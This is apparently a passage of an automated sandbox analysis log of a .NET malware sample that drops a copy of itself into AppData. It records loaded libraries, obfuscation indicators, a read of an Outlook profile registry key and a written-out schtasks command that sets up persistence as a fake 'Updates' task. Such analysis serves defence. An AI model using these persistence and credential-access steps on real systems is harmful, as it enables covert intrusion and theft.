                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeSection loaded: dwrite.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeSection loaded: iconcodecservice.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                  Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                  Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeSection loaded: rasapi32.dll
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeSection loaded: rasman.dll
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeSection loaded: rtutils.dll
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeSection loaded: mswsock.dll
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeSection loaded: winhttp.dll
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeSection loaded: iphlpapi.dll
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeSection loaded: dhcpcsvc6.dll
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeSection loaded: dnsapi.dll
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeSection loaded: winnsi.dll
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeSection loaded: rasadhlp.dll
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeSection loaded: fwpuclnt.dll
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeSection loaded: secur32.dll
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeSection loaded: schannel.dll
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeSection loaded: mskeyprotect.dll
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeSection loaded: ntasn1.dll
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeSection loaded: ncrypt.dll
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeSection loaded: ncryptsslp.dll
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeSection loaded: msasn1.dll
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeSection loaded: gpapi.dll
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeSection loaded: dpapi.dll
                  Source: C:\Users\user\Desktop\7495 P.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Users\user\Desktop\7495 P.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: 7495 P.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: 7495 P.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                  Data Obfuscation

                  barindex
                  Source: 2.2.7495 P.exe.84a0000.5.raw.unpack, EYXaffSSoNkmQUFZXO.cs.Net Code: DS8NTsfENX System.Reflection.Assembly.Load(byte[])
                  Source: C:\Users\user\Desktop\7495 P.exeCode function: 13_2_03259C30 push esp; retf 057Ah13_2_03259D55
                  Source: C:\Users\user\Desktop\7495 P.exeCode function: 13_2_06F8890D push es; ret 13_2_06F88920
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeCode function: 14_2_04B0C890 push esp; iretd 14_2_04B0C899
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeCode function: 14_2_04B2F05A push 00000040h; retf 14_2_04B2F05C
                  Source: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeCode function: 18_2_06DF890D push es; ret 18_2_06DF8920
                  Source: 7495 P.exeStatic PE information: section name: .text entropy: 7.77859920149893
                  Source: HRrXXnBIpL.exe.2.drStatic PE information: section name: .text entropy: 7.77859920149893
                  Source: 2.2.7495 P.exe.84a0000.5.raw.unpack, dbsmttiiDVEb12vWOk.csHigh entropy of concatenated method names: 'xG8dBH9ukT', 'DGbdElAqQ6', 'rvZddNAJBp', 'Cafdq8pJn0', 'RhpdtxPJ0A', 'vXPdlI6XMZ', 'Dispose', 'ftbChj1Ab1', 'yAECnX6WDO', 'NRqC1b1JKa'
                  Source: 2.2.7495 P.exe.84a0000.5.raw.unpack, nm4eSCpDGP9gMKV4GiU.csHigh entropy of concatenated method names: 'x9Sq3NQfUf', 'UwBqzJ03Dt', 'nOVJm96EoI', 'M2W2v5VyWAokuYZouGH', 'ytdL8SVgesT2W8aC7oR', 'rIojZ5V37qgDc3S8wQF'
                  Source: 2.2.7495 P.exe.84a0000.5.raw.unpack, j63Fue4OaOaEKKJ7Gx.csHigh entropy of concatenated method names: 'xPNTSndIe', 'afOg2HvQi', 'KXPPVfj05', 'vyj9mJXO1', 'HNuoqWCTD', 'o8yRsMPnT', 'ipUHr10rX2BW6BZuQU', 'yJr9hPQyY9FBxP3ssH', 'xpDCGYo3C', 'sWxsX0pel'
                  Source: 2.2.7495 P.exe.84a0000.5.raw.unpack, Hfl3wARIJIMmO3MV8y.csHigh entropy of concatenated method names: 'yNhXWNyfUb', 'pwcX9ANIIB', 'E6k12kFHKK', 'Csw1QdWVY3', 'A4v16TvkmF', 'ak71e8IhLa', 'vic1wSRRpR', 'Pbi1u5PNYC', 'NmC1M3oR6L', 'wZt1L6UlbN'
                  Source: 2.2.7495 P.exe.84a0000.5.raw.unpack, zxLHAJppkLYQ89Jgl7Y.csHigh entropy of concatenated method names: 'sKhs3eEOAR', 'YgeszFLg6K', 'IuLqmTcqui', 'OtZqpjX0N6', 'b7iq4wxppn', 'OSeqDHnLvI', 'jGOqNGGgqH', 'hirqZ3bZWr', 'uFSqhrtkLN', 'Mb1qnFRwFl'
                  Source: 2.2.7495 P.exe.84a0000.5.raw.unpack, n7Cr5vpNucstSTql7Fq.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Jq3Jdo1NTs', 'Mb6Jswlkn7', 'K8OJq9K9di', 'bnUJJGFqXY', 'lh2JtyPDuN', 'lt2JfINoft', 'MsLJlIc7lK'
                  Source: 2.2.7495 P.exe.84a0000.5.raw.unpack, qkFlaUNh1nyJUrYxEi.csHigh entropy of concatenated method names: 'HsppKMu2NO', 'LqVpSRQXxS', 'fI4pFTHEfP', 'NDSpac2fl3', 'YMVpB8ytd2', 'y0LpOMK4aB', 'A10Yw6EsHyKO9Ujjky', 'U4mLrUO4DrQULbkNhT', 'BcyppeKohM', 'znCpD6rgEl'
                  Source: 2.2.7495 P.exe.84a0000.5.raw.unpack, sYb4RfGC69bR4EKMe0.csHigh entropy of concatenated method names: 'Rky5Y5ACcW', 'eJB5oM0xpD', 'qeV5rEBObQ', 'K975Ia4baR', 'O4a5QaR2EI', 'aUC56LKBGM', 'eJb5wLFNEy', 'OHF5uaHdJR', 'RQm5LuOyXj', 'r265ySG2yZ'
                  Source: 2.2.7495 P.exe.84a0000.5.raw.unpack, JfYgeIzJ2NnZOFTOmv.csHigh entropy of concatenated method names: 'DwAsPpkrYO', 'gLIsYwrAYG', 'aVMso7MbT8', 'wW4sriMP9k', 'YUQsIq9SnT', 'r5AsQCqNa6', 'tEIs6YY3Bc', 'd6bsleRGnX', 'u5XsHweati', 'VhVsUjhkiJ'
                  Source: 2.2.7495 P.exe.84a0000.5.raw.unpack, jLj2jgV09kSwCs3sih.csHigh entropy of concatenated method names: 'ToString', 'YA4OybGb35', 'zlsOIKs5FX', 'bW0O2jdsCZ', 'MDUOQKXDX9', 'GLgO6AMHiY', 'KTOOeb4kkx', 'GyjOwJh1Fj', 'UUdOuxmFmP', 'GOOOMImxKY'
                  Source: 2.2.7495 P.exe.84a0000.5.raw.unpack, EYXaffSSoNkmQUFZXO.csHigh entropy of concatenated method names: 'TZBDZjNBKN', 'NJhDhhknYu', 'zY2Dn6l0iB', 'P2rD1yqdeu', 'qSLDXpDPjm', 'FIHDcy1hpc', 'va7DKDy3wh', 'OXwDSNqU6E', 'NBTD0BL0LP', 'jPPDFawx4H'
                  Source: 2.2.7495 P.exe.84a0000.5.raw.unpack, aMu2NOYwqVRQXxSL3P.csHigh entropy of concatenated method names: 'djDnA2ReSO', 'RqNn8qLhAh', 'XH1nVibYkq', 'OlfnbkXVLs', 'XdanxCuxuH', 'jMJnvX6r7A', 'HMyniCsYLq', 'Yaxn7xluHm', 'vX4njZZfCD', 'iGZn33Zt0U'
                  Source: 2.2.7495 P.exe.84a0000.5.raw.unpack, un2dUUvNRE9V1TiVxJ.csHigh entropy of concatenated method names: 'y7wE7I6NrS', 'qVrE3AJaO2', 'WvrCmK7RJu', 'VC2CpgQ1h6', 'HZCEyJhbSZ', 'EnjEk59aUE', 'p9FEG18rti', 'rVDEALDJfm', 'y4lE8pslyb', 'AUTEVB1E3b'
                  Source: 2.2.7495 P.exe.84a0000.5.raw.unpack, vd2U0LrMK4aBopMyr5.csHigh entropy of concatenated method names: 'Kq1cZbmk9j', 'yDncnjvL24', 'OEFcXmI742', 'kv8cK7yRtt', 'kZvcScfCDA', 'X3kXxXfoKt', 'RNgXvEj5my', 'gXLXi02kB7', 'md1X7jfcib', 'rf7XjBfvTE'
                  Source: 2.2.7495 P.exe.84a0000.5.raw.unpack, ulHQ9gnCneNe2MIwFG.csHigh entropy of concatenated method names: 'Dispose', 'SEbpj12vWO', 'KLS4IU75v9', 'Oqc9U9A5tN', 'PiTp3hVlni', 'H13pzwSGd7', 'ProcessDialogKey', 'nUl4mW6VFl', 'n3p4pJkgwt', 'jJ2449QvYV'
                  Source: 2.2.7495 P.exe.84a0000.5.raw.unpack, JG9j8XMoCb0SA5R7J8.csHigh entropy of concatenated method names: 'x4nKHpE4H4', 'zdPKU47p54', 'Q3CKTJvZRH', 'wcdKgpPOFU', 'KucKW54GJe', 'hsvKPQd3dL', 'cD2K9wj6DO', 'APJKY4jjSo', 'lg3KodM4OI', 'gjuKR5OlJ0'
                  Source: 2.2.7495 P.exe.84a0000.5.raw.unpack, IdcCMfpmydm21tNVHI9.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Prusy2kYyO', 'NN7skyGGrL', 'zJTsG43DXA', 'rRjsAuPURu', 'lO3s8cKHk0', 'F1esVDBo13', 'bESsbH5yhG'
                  Source: 2.2.7495 P.exe.84a0000.5.raw.unpack, WGrvjlbbTfv3wMCCST.csHigh entropy of concatenated method names: 'bmxEFdCUfV', 'AK5EaLRhx7', 'ToString', 'v7eEh4qCQw', 'Pk8EnhRfVo', 'wr4E122iWl', 'aodEXZbjW1', 'fE4EcpVubB', 'InhEK5Q1Ys', 'M4FESHYTjc'
                  Source: 2.2.7495 P.exe.84a0000.5.raw.unpack, zNQGChoI4THEfPLDSc.csHigh entropy of concatenated method names: 'xf31g25hMv', 'lAh1P1Vnnm', 'IMI1YfHNWl', 'Rbx1oKNUB7', 'uDB1BLLSah', 'x2Y1OXRm5Z', 'Q2j1EhW1wb', 'doa1CBBKeM', 'iJg1dIyt9r', 'qm41s4msOT'
                  Source: 2.2.7495 P.exe.84a0000.5.raw.unpack, xW6VFlja3pJkgwtcJ2.csHigh entropy of concatenated method names: 'HNDdrmEAqE', 'a2PdI8BrZb', 'kOud2n4hLg', 'NJIdQGQZsC', 'KZMd6wntBA', 'Kp4deGtSJC', 'qxtdwTtCtd', 'v9AduPOyA5', 'i02dMAdCQu', 'TTydL17vAq'
                  Source: 2.2.7495 P.exe.84a0000.5.raw.unpack, jNy4aY1rqZaqRkbjyD.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'VDx4jxqCmh', 'sxo43clMgf', 'QZa4zKPA1E', 'B5vDmrq3Sg', 'DtxDpqkTHK', 'jOjD4Mn6mh', 'n5wDDqKbb5', 'zu4prUrLA8BZuTGpDwo'
                  Source: 2.2.7495 P.exe.84a0000.5.raw.unpack, gZl7bowfAG75dpC8i5.csHigh entropy of concatenated method names: 'iepKhSHU2G', 'NDWK1Dj0q5', 'wIUKcG2uhm', 'Vihc3S44nf', 'Gc8czn15YA', 'BeQKmNvOTS', 'hoYKpWBElF', 'yetK41LaHu', 'sstKD0Cvyu', 'epOKN5iDfD'
                  Source: 2.2.7495 P.exe.84a0000.5.raw.unpack, CQvYVH3CQQSZ1ObM8J.csHigh entropy of concatenated method names: 'Qyis1ujF9s', 'IpssXNGqiU', 'O3Escneiwt', 'xpPsK77Bsa', 'ilvsdklRKy', 'YYrsSDrsvx', 'Next', 'Next', 'Next', 'NextBytes'
                  Source: 2.2.7495 P.exe.84a0000.5.raw.unpack, uxQeYBp4xqx0pBaKFfR.csHigh entropy of concatenated method names: 'ToString', 'XO6qYci0On', 'TWQqoT9nhM', 'kvLqRy8kiH', 't8Eqr54LPW', 'wN4qIYfedv', 'b2dq2hCZ6Z', 'p4cqQkmpjO', 'yS93BnVNOUXmrfmIC0T', 'EeDxA7Vh5fdYVHYubdw'
                  Source: C:\Users\user\Desktop\7495 P.exeFile created: C:\Users\user\AppData\Roaming\HRrXXnBIpL.exeJump to dropped file

                  Boot Survival

                  barindex
                  Source: C:\Users\user\Desktop\7495 P.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HRrXXnBIpL" /XML "C:\Users\user\AppData\Local\Temp\tmp843E.tmp"

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\7495 P.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
